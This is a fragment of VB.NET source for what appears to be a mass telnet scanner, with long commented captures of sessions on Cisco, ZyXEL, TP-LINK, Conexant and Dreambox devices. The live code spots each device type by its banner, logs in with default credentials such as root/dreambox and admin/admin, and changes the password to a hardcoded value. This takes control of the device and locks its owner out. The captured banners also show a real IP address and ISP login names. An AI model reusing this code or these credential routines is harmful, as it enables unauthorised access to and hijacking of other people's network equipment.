				'                        2. Change PPP User Name and Password
				'                        3. Change User Password

				'                              Press 'B' to go Back
				'                          Press 'M' to go to Main Menu
				'                           Enter your selection below



				'>>>


				'                           CONEXANT SYSTEMS, INC.
				'                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

				'                                     Quit Session


				'                        This will quit current telnet session.


				'                     Press 'Y' to continue, or 'B' to go back.
				'                             Press 'M' for main menu.


				'>>>



				'************************************************************************************
				'NetDVRDVS:admin
				'Password:
				'Login incorrect


				'************************************************************************************
				'User Access Verification

				'Username: admin
				'Password:
				'% Login invalid


				'************************************************************************************
				'(212.217.28.244)
				'User Access Verification

				'Password: 1234
				'GPBM>help
				'Help may be requested at any point in a command by entering
				'a question mark '?'.  If nothing matches, the help list will
				'be empty and you must backup until entering a '?' shows the
				'available options.
				'Two styles of help are provided:
				'1. Full help is available when you are ready to enter a
				'   command argument (e.g. 'show ?') and describes each possible
				'   argument.
				'2. Partial help is provided when an abbreviated argument is entered
				'   and you want to know what arguments match the input
				'   (e.g. 'show pr?'.)

				'GPBM>
				'GPBM>?
				'Exec commands:
				'  <1-99>           Session number to resume
				'  access-enable    Create a temporary Access-List entry
				'  access-profile   Apply user-profile to interface
				'  clear            Reset functions
				'  connect          Open a terminal connection
				'  disable          Turn off privileged commands
				'  disconnect       Disconnect an existing network connection
				'  enable           Turn on privileged commands
				'  exit             Exit from the EXEC
				'  help             Description of the interactive help system
				'  lock             Lock the terminal
				'  login            Log in as a particular user
				'  logout           Exit from the EXEC
				'  name-connection  Name an existing network connection
				'  pad              Open a X.29 PAD connection
				'  ping             Send echo messages
				'  ppp              Start IETF Point-to-Point Protocol (PPP)
				'  resume           Resume an active network connection
				'  rlogin           Open an rlogin connection
				'  set              Set system parameter (not config)
				'  show             Show running system information
				'  slip             Start Serial-line IP (SLIP)
				'  systat           Display information about terminal lines
				'  telnet           Open a telnet connection
				'  terminal         Set terminal line parameters
				'  traceroute       Trace route to destination
				'  tunnel           Open a tunnel connection
				'  where            List active connections
				'  x28              Become an X.28 PAD
				'  x3               Set X.3 parameters on PAD

				'GPBM>

				'GPBM>ping 8.8.8.8

				'Type escape sequence to abort.
				'Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
				'!!!!!
				'Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
				'GPBM>

				'GPBM>show ?
				'backup         Backup status
				'c1700          Show c1700 information
				'cca            CCA information
				'cdapi          CDAPI information
				'class-map      Show QoS Class Map
				'clock          Display the system clock
				'compress       Show compression statistics
				'dialer         Dialer parameters and statistics
				'exception      exception informations
				'flash:         display information about flash: file system

				'history        Display the session command history
				'hosts          IP domain-name, lookup style, nameservers, and host table
				'isdn           ISDN information
				'location       Display the system location
				'modemcap       Show Modem Capabilities database
				'policy-map     Show QoS Policy Map
				'ppp            PPP parameters and statistics
				'queue          Show queue contents
				'queueing       Show queueing configuration
				'radius         Shows radius information
				'rmon           rmon statistics
				'rtr            Response Time Reporter (RTR)
				'sessions       Information about Telnet connections
				'snmp           snmp statistics
				'tacacs         Shows tacacs+ server statistics
				'template       Template information
				'terminal       Display terminal configuration parameters
				'traffic-shape  traffic rate shaping configuration
				'users          Display information about terminal lines
				'version        System hardware and software status

				'GPBM>show version
				'Cisco Internetwork Operating System Software
				'IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
				'Copyright (c) 1986-2000 by cisco Systems, Inc.
				'Compiled Tue 14-Mar-00 16:40 by cmong
				'Image text-base: 0x80008088, data-base: 0x805B7EE0

				'ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)

				'GPBM uptime is 5 weeks, 6 days, 45 minutes
				'System returned to ROM by power-on
				'System image file is "flash:c1700-y-mz.121-1"

				'cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
				'.
				'Processor board ID JAD04180989 (362865562), with hardware revision 0000
				'M860 processor: part number 0, mask 32
				'Bridging software.
				'X.25 software, Version 3.0.0.
				'Basic Rate ISDN software, Version 1.1.
				'1 FastEthernet/IEEE 802.3 interface(s)
				'1 Serial(sync/async) network interface(s)
				'1 ISDN Basic Rate interface(s)
				'32K bytes of non-volatile configuration memory.
				'4096K bytes of processor board System flash (Read/Write)

				'Configuration register is 0x2102

				'GPBM>show diag
				'Slot 0:
				'        C1720 1FE Mainboard Port adapter, 3 ports
				'        Port adapter is analyzed
				'        Port adapter insertion time unknown
				'        EEPROM contents at hardware discovery:
				'        Hardware Revision        : 5.1
				'        PCB Serial Number        : JAD04180989
				'        Part Number              : 73-3201-05
				'        Board Revision           : 70
				'        Fab Version              : 04
				'        EEPROM format version 4
				'        EEPROM contents (hex):
				'          0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
				'          0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
				'          0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
				'          0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
				'          0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
				'          0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
				'          0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
				'          0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF

				'        WIC Slot 0:
				'        Serial 1T WAN daughter card
				'        Hardware revision 1.0   Board revision H0
				'        Serial number     0018074153    Part number    800-01514-01
				'        Test history      0x00          RMA number     00-00-00
				'        Connector type    WAN Module
				'        EEPROM format version 1
				'        EEPROM contents (hex):
				'        0x20:   01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
				'        0x30:   88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF

				'        WIC Slot 1:
				'        BRI S/T - 2186 WAN daughter card
				'        Hardware revision 1.3   Board revision A0
				'        Serial number     0019915070    Part number    800-01833-03
				'        Test history      0x00          RMA number     00-00-00
				'        Connector type    WAN Module
				'        EEPROM format version 1
				'        EEPROM contents (hex):
				'        0x20:   01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
				'        0x30:   50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF




				'************************************************************************************
				'-----------------------------------------------------------------------
				'Cisco Router and Security Device Manager (SDM) is installed on this device.
				'This feature requires the one-time use of the username "cisco"
				'with the password "cisco". The default username and password have a privilege le
				'vel of 15.

				'Please change these publicly known initial credentials using SDM or the IOS CLI.

				'Here are the Cisco IOS commands.

				'username <myuser>  privilege 15 secret 0 <mypassword>
				'no username cisco

				'Replace <myuser> and <mypassword> with the username and password you want to use
				'.

				'For more information about SDM please follow the instructions in the QUICK START

				'GUIDE for your router or go to http://www.cisco.com/go/sdm
				'-----------------------------------------------------------------------


				'User Access Verification

				'Username: cisco
				'Password:
				'% Login invalid


				'************************************************************************************                
				'BCM96338 ADSL Router
				'Login: bad
				'Password:
				'Login incorrect. Try again.
				'Login: admin
				'Password: password

				'Note: If you have problem with Backspace key, please make sure you configure you
				'r terminal emulator settings. For instance, from HyperTerminal you would need to
				' use File->Properties->Setting->Back Space key sends.


				'   Main Menu

				'1.  ADSL Link State
				'2.  LAN
				'3.  WAN
				'4.  DNS Server
				'5.  Route Setup
				'6.  NAT
				'7.  Firewall
				'8.  Quality Of Service
				'9.  Management
				'10. Passwords
				'11. Diag
				'12. Reset to Default
				'13. Save and Reboot
				'14. Exit
				' ->

				'(10)

				'Note: If you have problem with Backspace key, please make sure you configure you
				'r terminal emulator settings. For instance, from HyperTerminal you would need to
				' use File->Properties->Setting->Back Space key sends.


				'   Password Menu

				'1. Admin
				'2. User
				'3. Support
				'4. Exit
				'''Passwords ->

				'Note: If you have problem with Backspace key, please make sure you configure you
				'r terminal emulator settings. For instance, from HyperTerminal you would need to
				' use File->Properties->Setting->Back Space key sends.


				'   Password Menu

				'1. Admin
				'2. User
				'3. Support
				'4. Exit
				'''Passwords -> 1

				'        Password Configuration Menu For User admin

				'Note: Maximum length of password is 16 characters.
				'Old password        :
				'New password        :
				'Confirm new password:
				'Password for admin changed successfully.

				'Hit <enter> to continue


				'Note: If you have problem with Backspace key, please make sure you configure you
				'r terminal emulator settings. For instance, from HyperTerminal you would need to
				' use File->Properties->Setting->Back Space key sends.


				'   DNS Menu

				'1. Configure
				'2. Show
				'3. Exit
				''' DNS Server -> 2

				'Automatic assigned IP address for DNS is enabled.
				'Primary DNS  : 62.251.229.237
				'Secondary DNS: 62.251.229.223

				'Hit <enter> to continue


				'14. Exit
				' -> 14

				'Bye bye. Have a nice day!!!


				'Perte de la connexion Ã  l'hÃ´te.


				'************************************************************************************ 
				'Password: 1234
				'                    Copyright (c) 1994 - 2003 ZyXEL Communications Corp.

				'                         Prestige 650R-E1 Main Menu
				'                          Prestige 645 Main Menu

				'Getting Started                      Advanced Management
				'  1. General Setup                     21. Filter Set Configuration
				'  3. LAN Setup                         22. SNMP Configuration
				'  4. Internet Access Setup             23. System Password
				'                                       24. System Maintenance
				'Advanced Applications                  25. IP Routing Policy Setup
				'  11. Remote Node Setup                26. Schedule Setup
				'  12. Static Routing Setup
				'  15. NAT Setup
				'                                       99. Exit






				'                     Enter Menu Selection Number:

				'(23)
				'

				'        Menu 23 - System Password

				'Old Password= ?
				'New Password= ?
				'Retype to confirm= ?













				' Enter here to CONFIRM or ESC to CANCEL:



				'

				'     Menu 4 - Internet Access Setup

				'ISP's Name= MyISP
				'Encapsulation= PPPoE
				'Multiplexing= LLC-based
				'VPI #= 8
				'VCI #= 35
				'ATM QoS Type= UBR
				'  Peak Cell Rate (PCR)= 0
				'  Sustain Cell Rate (SCR)= 0
				'  Maximum Burst Size (MBS)= 0
				'My Login= saidi_im
				'My Password= ********
				'Idle Timeout (sec)= 0
				'IP Address Assignment= Dynamic
				'  IP Address= N/A
				'Network Address Translation= SUA Only
				'  Address Mapping Set= N/A

				'Press ENTER to Confirm or ESC to Cancel:


				'************************************************************************************             
				'Password: 1234

				'                    Copyright (c) 1994 - 2004 ZyXEL Communications Corp.

				'                         Prestige 660HW-61 Main Menu

				'Getting Started                      Advanced Management
				'  1. General Setup                     21. Filter Set Configuration
				'  2. WAN Backup Setup                  22. SNMP Configuration
				'  3. LAN Setup                         23. System Security
				'  4. Internet Access Setup             24. System Maintenance
				'                                       25. IP Routing Policy Setup
				'Advanced Applications                  26. Schedule Setup
				'  11. Remote Node Setup
				'  12. Static Routing Setup
				'  14. Dial-in User Setup               99. Exit
				'  15. NAT Setup





				'                     Enter Menu Selection Number:

				'(23)

				'

				'        Menu 23 - System Security

				'1. Change Password
				'2. RADIUS Server

				'4. IEEE802.1x

				'(1)
				'
				'Menu 23.1 - System Security - Change Password

				'  Old Password= ?
				'  New Password= ?
				'  Retype to confirm= ?













				'   Enter here to CONFIRM or ESC to CANCEL:










				'      Enter Menu Selection Number:



				'************************************************************************************
				'(Cisco router)
				'User Access Verification

				'Username: bad
				'Password:
				'% Login invalid

				'Username: admin
				'Password:
				'% Login invalid

				'Username: admin
				'Password:
				'% Login invalid


				'Perte de la connexion Ã  l'hÃ´te.


				'************************************************************************************
				'**************************
				'*                        *
				'*   The Gemini Project   *
				'*                        *
				'**************************

				'welcome on your dreambox! - Kernel 2.6.9 (09:30:19).

				'dreambox login: root
				'Password:


				'BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
				'Enter 'help' for a list of built-in commands.

				'root@dreambox:~>
				'root@dreambox:~> help
				'
				'Built-in commands:
				'-------------------
				'        . : alias bg break cd chdir command continue eval exec exit export
				'        false fg getopts hash help jobs kill let local pwd read readonly
				'        return set shift times trap true type ulimit umask unalias unset
				'        wait
				'root@dreambox:~> passwd
				'Changing password for root
				'Enter the new password (minimum of 5, maximum of 8 characters)
				'Please use a combination of upper and lower case letters and numbers.
				'Enter new password:
				'Re-enter new password:
				'Password changed.
				'root@dreambox:~>
				'root@dreambox:~>
				'\[                  fusermount          mkdir               start-stop-daemon
				'ash                 gbox                mknod               streampes
				'automount           gbox.ver            mkswap              streamripper
				'awk                 gdaemon             mmi.socket          streamsec
				'basename            gdaemon.socket      more                streamts
				'boot                grep                mount               stty
				'bunzip2             gunzip              mv                  su
				'busybox             gzip                nc                  swapoff
				'bzcat               halt                netstat             swapon
				'cat                 hdparm              nslookup            sync
				'chgrp               head                online.log          syslogd
				'chmod               hostname            passwd              tail
				'chown               hotplug             pid.info            tar
				'chroot              hotplug.socket      pidof               telnet
				'clear               httpd               ping                telnetd
				'cp                  id                  pmt.tmp             test
				'date                ifconfig            poweroff            top
				'dd                  in.ftpd             prockill            touch
				'df                  in.telnetd          ps                  true
				'dmesg               inadyn              pwd                 tty
				'dos2unix            inetd               rdate               udhcpc
				'dropbear            init                reboot              udpstreampes
				'dropbearkey         insmod              reset               umount
				'dropbearmulti       kill                rm                  uname
				'du                  killall             rmdir               uniq
				'dvbnet              klogd               rmmod               unix2dos
				'echo                lcdoff              route               uptime
				'enigma              lcdstuff            sc.info             usleep
				'enigmanet           ln                  sc01.info           vi
				'env                 loadkmap            scp                 wc
				'eraseall            logger              sed                 wget
				'etherwake           login               sh                  which
				'expr                logread             showlogo            whoami
				'false               losetup             sleep               xargs
				'find                ls                  smbmnt              yes
				'flashtool           lsmod               smbmount            zcat
				'free                md5sum              sort
				'************************************************************************************

				'#End Region

				If banner.Contains("dreambox") Then
					'dreambox login:
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" & vbCr), SocketFlags.None)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> BANNERPASSWORD01: " & stringdata, myip)
					'Password:
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" & vbCr), SocketFlags.None)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> Response telnet01: " & stringdata, myip)
				Else
					'Vulcan
					'login:
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" & vbCr), SocketFlags.None)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> BANNERPASSWORD: " & stringdata, myip)
					'password:
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" & vbCr), SocketFlags.None)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> Response telnet01: " & stringdata, myip)
				End If
				'      cisco/cisco
				recv = Sock_scan.Receive(data)
				stringdata = Encoding.ASCII.GetString(data, 0, recv)
				Console.WriteLine("{0} -> Response telnet01a: " & stringdata, myip)
				'Login Successful

				'login:
				If stringdata.Contains("ogin:") Then
					Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip)
				Else
					'$
					'$passwd
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" & vbCr), SocketFlags.None)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> Response telnet01b: " & stringdata, myip)
					If banner.Contains("Vulcan") Then
						'Enter Old Password:       
						Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" & vbCr), SocketFlags.None)
						recv = Sock_scan.Receive(data)
						stringdata = Encoding.ASCII.GetString(data, 0, recv)
						Console.WriteLine("{0} -> Response telnet01c: " & stringdata, myip)
							'On a pas cette ligne sur une BusyBox ou une dreambox
					Else
					End If
					'Enter New Password:
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> Response telnet01d: " & stringdata, myip)
					'Confirm New Password:
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> Response telnet01e: " & stringdata, myip)
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
						'Login incorrect   (dreambox)

						'Password changed

						'Set Done
						'SINON:    Erreur: Combinaison nom utilisateur/mot de passe invalide

						'passwd: An error occurred updating the password file.     //BusyBox
					Console.WriteLine("{0} -> Response telnet01f: " & stringdata, myip)
				End If
				'login:

				Sock_scan.Close()
			End If

			If banner.Contains("assword:") Then
				'#Region "BANNERS"
				'********************************************************
				'Info:Connection was denied by remote host according to ACL!

				'********************************************************
				'Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
				'admin
				'Valid commands are:
				'sys             exit            ether           wan
				'ip              bridge          dot1q           pktqos
				'show            set             lan

				'********************************************************
				'Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
				'1234
				'Valid commands are:
				'sys             exit            ether           wan
				'etherdbg        usb             ip              bridge
				'dot1q           pktqos          show            set
				'lan
				'
				'tc> sys countrycode
				'country code = 253                //Djibouti

				'********************************************************
				'                         *******************
				'                         Welcome to Vulcan
				'                         *******************

				'Conexant Inc., Software Release 3.C10MTT0.8822A
				'Copyright (c) 2001-2003 by Conexant, Inc.

				'login:
				'admin

				'password:
				'admin
				'Login Successful
				'$
				'$help
				'Command        Description
				'-------        -----------
				'alias          To Alias a command
				'apply          Apply configuration/image file
				'commit         Commit the active config to the flash
				'create         Create a new entry of specified type
				'delete         Delete the specified entry
				'download       Download a file on to the Device
				'exit           To exit the CLI shell
				'get            Display info for the search
				'help           Provides help
				'list           List files
				'modify         Modify information for specified entry
				'passwd         To modify user password
				'ping           The normal ping command
				'prompt         Change the user prompt
				'reboot         Reboot the device
				'remove         Remove file
				'reset          Reset info for the specified entry
				'size           ATM Sizing Information
				'traceroute     The normal traceroute command
				'trigger        To set trigger
				'unalias        To undefine previously defined alias
				'verbose        Switch ON/OFF the verbose mode


				'********************************************************
				'Password: 1234
				'Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
				'ras>
				'ras> help
				'Valid commands are:
				'sys             exit            ether           wan
				'aux             wlan            ip              ipsec
				'bridge          certificates    bm              lan
				'vlan            radius          8021x           autoSec
				'ras> sys
				'packetscan      adjtime         callhist        countrycode
				'date            domainname      edit            extraphnum
				'feature         firewall        myZyxelCom      hostname
				'logs            stdio           datetime        time
				'tos             trcdisp         trclog          trcpacket
				'version         view            wdog            romreset
				'upnp            atsh            atmu            ateb
				'xmodemmode      diag            save            display
				'adminPassword   userPassword    default         fwnotify
				'tripleplay      general         socket          filter
				'ddns            cpu             winmes          snmp
				'ras> sys adminPassword
				'Usage: adminPassword <new adminPassword>
				'ras> sys adminPassword j3R0m3!!

				'
'                                        Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
'
'                                                  Prestige 650R-E1 Main Menu
'
'                         Getting Started                      Advanced Management
'                           1. General Setup                     21. Filter Set Configuration
'                           3. LAN Setup                         22. SNMP Configuration
'                           4. Internet Access Setup             23. System Password
'                                                                24. System Maintenance
'                         Advanced Applications                  25. IP Routing Policy Setup
'                           11. Remote Node Setup                26. Schedule Setup
'                           12. Static Routing Setup
'                           15. NAT Setup
'                                                                99. Exit
'
'
'
'
'
'
'                                              Enter Menu Selection Number:
'                    

				'
'                                                 Menu 1 - General Setup
'
'                    System Name= ?
'                    Location=
'                    Contact Person's Name=
'                    Domain Name=
'                    Edit Dynamic DNS= No
'
'                    Route IP= Yes
'                    Bridge= No
'
'
'
'
'
'
'
'
'                    Press ENTER to Confirm or ESC to Cancel:
'                    

				'
'                    
'
'                            Menu 23 - System Password
'
'                    Old Password= ?
'                    New Password= ?
'                    Retype to confirm= ?
'
'
'
'
'
'
'
'
'
'
'
'
'
'                     Enter here to CONFIRM or ESC to CANCEL:
'                    

				'
'                                                   Menu 3 - LAN Setup
'
'                    1. LAN Port Filter Setup
'                    2. TCP/IP and DHCP Setup
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'                          Enter Menu Selection Number:
'                    

				'
'                                            Menu 3.1 - LAN Port Filter Setup
'
'                    Input Filter Sets:
'                      protocol filters=
'                      device filters=
'                    Output Filter Sets:
'                      protocol filters=
'                      device filters=
'                    

				'
'                                            Menu 3.2 - TCP/IP and DHCP Setup
'
'                    DHCP Setup
'                      DHCP= Server
'                      Client IP Pool Starting Address= 192.168.1.33
'                      Size of Client IP Pool= 32
'                      Primary DNS Server= 0.0.0.0
'                      Secondary DNS Server= 0.0.0.0
'                      Remote DHCP Server= N/A
'                    TCP/IP Setup:
'                      IP Address= 192.168.1.1
'                      IP Subnet Mask= 255.255.255.0
'                      RIP Direction= Both
'                        Version= RIP-2B
'                      Multicast= None
'                      IP Policies=
'                      Edit IP Alias= No
'
'                    Press ENTER to Confirm or ESC to Cancel:
'
'Press Space Bar to Toggle.
'                    

				'
'                                             Menu 4 - Internet Access Setup
'
'                    ISP's Name= MyISP
'                    Encapsulation= PPPoE
'                    Multiplexing= LLC-based
'                    VPI #= 8
'                    VCI #= 35
'                    ATM QoS Type= UBR
'                      Peak Cell Rate (PCR)= 0
'                      Sustain Cell Rate (SCR)= 0
'                      Maximum Burst Size (MBS)= 0
'                    My Login= zemzem2
'                    My Password= ********
'                    Idle Timeout (sec)= 0
'                    IP Address Assignment= Dynamic
'                      IP Address= N/A
'                    Network Address Translation= SUA Only
'                      Address Mapping Set= N/A
'
'                    Press ENTER to Confirm or ESC to Cancel:
'                    

				'
'                                               Menu 11 - Remote Node Setup
'
'                     1. MyISP (ISP, SUA)
'                     2. ________
'                     3. ________
'                     4. ________
'                     5. ________
'                     6. ________
'                     7. ________
'                     8. ________
'
'
'
'
'
'
'
'
'                              Enter Node # to Edit:
'                    

				'
'                                             Menu 11.1 - Remote Node Profile
'
'     Rem Node Name= MyISP                 Route= IP
'     Active= Yes                          Bridge= No
'
'     Encapsulation= PPPoE                 Edit IP/Bridge= No
'     Multiplexing= LLC-based              Edit ATM Options= No
'     Service Name= zyxel
'     Incoming:                            Telco Option:
'       Rem Login=                           Allocated Budget(min)= 0
'       Rem Password= ********               Period(hr)= 0
'     Outgoing:                              Schedule Sets=
'       My Login= zemzem2                    Nailed-Up Connection= Yes
'       My Password= ********              Session Options:
'       Authen= CHAP/PAP                     Edit Filter Sets= No
'                                            Idle Timeout(sec)= N/A
'                                          Edit Traffic Redirect= No
'
'                    Press ENTER to Confirm or ESC to Cancel:
'                    

				'
'                                           Menu 21 - Filter Set Configuration
'
'     Filter                               Filter
'     Set #        Comments                Set #        Comments
'     ------  -----------------            ------  -----------------
'       1      _______________               7      _______________
'       2      _______________               8      _______________
'       3      _______________               9      _______________
'       4      _______________              10      _______________
'       5      _______________              11      _______________
'       6      _______________              12      _______________
'
'
'
'                    Enter Filter Set Number to Configure= 0
'
'                    Edit Comments= N/A
'
'                    Press ENTER to Confirm or ESC to Cancel:
'                    

				'
'                                            Menu 21.1 - Filter Rules Summary
'
' # A Type                       Filter Rules                              M m n
' - - ---- --------------------------------------------------------------- - - -
' 1 N
' 2 N
' 3 N
' 4 N
' 5 N
' 6 N
'
'
'
'
'
'
'
'
'                  Enter Filter Rule Number (1-6) to Configure:
'
'                    

				'
'                                            Menu 21.1.1 - TCP/IP Filter Rule
'
'                   Filter #: 1,1
'                   Filter Type= TCP/IP Filter Rule
'                   Active= No
'                   IP Protocol= 0     IP Source Route= No
'                   Destination: IP Addr=
'                                IP Mask=
'                                Port #=
'                                Port # Comp= None
'                        Source: IP Addr=
'                                IP Mask=
'                                Port #=
'                                Port # Comp= None
'                   TCP Estab= N/A
'                   More= No           Log= None
'                   Action Matched= Check Next Rule
'                   Action Not Matched= Check Next Rule
'
'                   Press ENTER to Confirm or ESC to Cancel:
'ress Space Bar to Toggle.
'                    

				'
'                                              Menu 22 - SNMP Configuration
'
'                  SNMP:
'                    Get Community= public
'                    Set Community= public
'                    Trusted Host= 0.0.0.0
'                    Trap:
'                      Community= public
'                      Destination= 0.0.0.0
'
'
'
'
'
'
'
'
'
'                    Press ENTER to Confirm or ESC to Cancel:
'                    

				'
'                                              Menu 24 - System Maintenance
'
'                         1.  System Status
'                         2.  System Information and Console Port Speed
'                         3.  Log and Trace
'                         4.  Diagnostic
'                         5.  Backup Configuration
'                         6.  Restore Configuration
'                         7.  Upload Firmware
'                         8.  Command Interpreter Mode
'                         9.  Call Control
'                         10. Time and Date Setting
'                         11. Remote Management
'
'
'
'
'
'                          Enter Menu Selection Number:
'                    

				'
'                                              Enter Menu Selection Number: 8
'
'
'Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
'ras> help
'Valid commands are:
'sys             exit            ether           wan
'ip              bridge
'ras>
'                    

				'
'                                         Menu 24.11 - Remote Management Control
'
'     TELNET Server:
'       Server Port = 23                   Server Access = ALL
'       Secured Client IP = 0.0.0.0
'
'     FTP Server:
'       Server Port = 21                   Server Access = ALL
'       Secured Client IP = 0.0.0.0
'
'     Web Server:
'       Server Port = 80                   Server Access = ALL
'       Secured Client IP = 0.0.0.0
'
'
'
'
'
'                    Press ENTER to Confirm or ESC to Cancel:
'                    





				'********************************************************
				'**************************
				'*                        *
				'*   The Gemini Project   *
				'*                        *
				'**************************

				'welcome on your dreambox! - Kernel 2.6.9 (17:51:55).

				'dreambox login: admin
				'Password:
				'Login incorrect
				'dreambox login:
				'
				'root/dreambox


				'********************************************************
				'***************************
				'*                         *
				'*   The Gemini Project    *
				'*                         *
				'***************************
				'*   Prepared By "drhg"    *
				'*  ( Dream-Gaza Team )    *
				'*   www.dreamgaza.com     *
				'***************************

				'Checking Kernel, Please Wait ....

				'Kernel 2.6.9.
				'md5sum (dreambox Linux ppc ).
				'head.ko = 308509 bytes.
				'Safe, NO 'clone bomb' found ... Congratulations.

				'Enjoy Original Gemini Project  without Time Bomb !.
				'---------------------------------------------------

				'(Friday, 17 September 2010).
				'welcome on your dreambox! - Kernel 2.6.9 (10:46:22).


				'dreambox login: bad
				'Password:
				'Login incorrect
				'dreambox login: root
				'Password:
				'Login incorrect
				'dreambox login: root
				'Password:
				'Login incorrect

				'********************************************************
				'OpenDreambox 1.5.0 dm800

				'dm800 login:
				'dm800 login: bad
				'Password:
				'Login incorrect
				'dm800 login: root
				'root@dm800:~#
				'CCcam_2011             head                   pyhtmlizer
				'StartNabCam            hexdump                python
				'\[                     hostname               rdjpgcom
				'addgroup               hotplug                readlink
				'adduser                id                     reboot
				'ar                     ifconfig               reboot.sysvinit
				'arping                 ifdown                 renice
				'ash                    ifup                   reset
				'automount              im                     rjoe
				'avahi-daemon           inadyn                 rm
				'awk                    inadyn_script.sh       rmdir
				'basename               inetd                  rmmod
				'bdpoll                 init                   route
				'bookify                init.sysvinit          rquotad
				'bunzip2                insmod                 run-parts
				'busybox                ip                     runlevel
				'bzcat                  ipkg                   rx
				'cat                    ipkg-cl                scp
				'cftp                   ipkg-link              sed
				'chat                   iwconfig               seq
				'chgrp                  iwgetid                sfdisk
				'chmod                  iwlist                 sh
				'chown                  iwpriv                 sha1sum
				'chroot                 iwspy                  showiframe
				'chvt                   jmacs                  showmount
				'cjpeg                  joe                    shutdown
				'ckeygen                jpegtran               shutdown.sysvinit
				'clear                  jpico                  sleep
				'conch                  jstar                  smartctl
				'cp                     kill                   smartd
				'cpio                   killall                smbd
				'crond                  killall5               sort
				'crontab                klogd                  ssh
				'cut                    last                   start-stop-daemon
				'czap                   last.sysvinit          statd
				'date                   lastb                  streamproxy
				'dbclient               ldconfig               strings
				'dbus-cleanup-sockets   less                   stty
				'dbus-daemon            lessecho               su
				'dbus-launch            lesskey                sulogin
				'dbus-monitor           ln                     swapoff
				'dbus-send              loadfont               swapon
				'dbus-uuidgen           loadkmap               sync
				'dc                     lockd                  sysctl
				'dccamd                 logger                 syslogd
				'dd                     login                  szap
				'deallocvt              logname                t-im
				'delgroup               logread                tail
				'deluser                lore                   tap2deb
				'depmod                 losetup                tap2rpm
				'depmod.26              ls                     tapconvert
				'df                     lsmod                  tar
				'dirname                mailmail               tda1002x
				'djpeg                  makedevs               tee
				'dmesg                  manhole                telinit
				'dos2unix               map-mbone              telnet
				'dropbear               mc                     telnetd
				'dropbearconvert        mcedit                 termidx
				'dropbearkey            mcmfmt                 test
				'dropbearmulti          mcview                 time
				'du                     md5sum                 tkconch
				'dumpkmap               mesg                   top
				'dvbsnoop               mesg.sysvinit          touch
				'dvbtraffic             mkdir                  tput
				'e2fsck                 mke2fs                 tr
				'echo                   mkfifo                 traceroute
				'egrep                  mkfs.ext2              trial
				'enigma2                mkfs.ext3              true
				'enigma2.sh             mknod                  tset
				'env                    mkswap                 tty
				'ethtool                mktap                  tuxtxt
				'exportfs               mktemp                 twistd
				'expr                   modprobe               tzap
				'false                  more                   udhcpc
				'fbset                  mount                  umount
				'fdisk                  mountd                 uname
				'fdisk.util-linux       mountpoint             uniq
				'femon                  mrinfo                 unix2dos
				'fgrep                  mrouted                unzip
				'find                   mv                     update-alternatives
				'free                   nc                     update-inetd
				'fsck.ext2              netstat                update-modules
				'fsck.ext3              nfs_server_script.sh   update-passwd
				'ftpget                 nfsd                   update-rc.d
				'ftpput                 nfsstat                uptime
				'getepgchannels         nhfsgraph              utmpdump
				'getkey                 nhfsnums               uudecode
				'getty                  nhfsrun                uuencode
				'grab                   nhfsstone              vi
				'grep                   nmbd                   vlock
				'gst-feedback           nslookup               vsftpd
				'gst-feedback-0.10      od                     wall
				'gst-inspect            openvpn                wall.sysvinit
				'gst-inspect-0.10       openvpn_script.sh      watch
				'gst-launch             openvt                 wc
				'gst-launch-0.10        passwd                 wdog
				'gst-typefind           patch                  wget
				'gst-typefind-0.10      pidof                  which
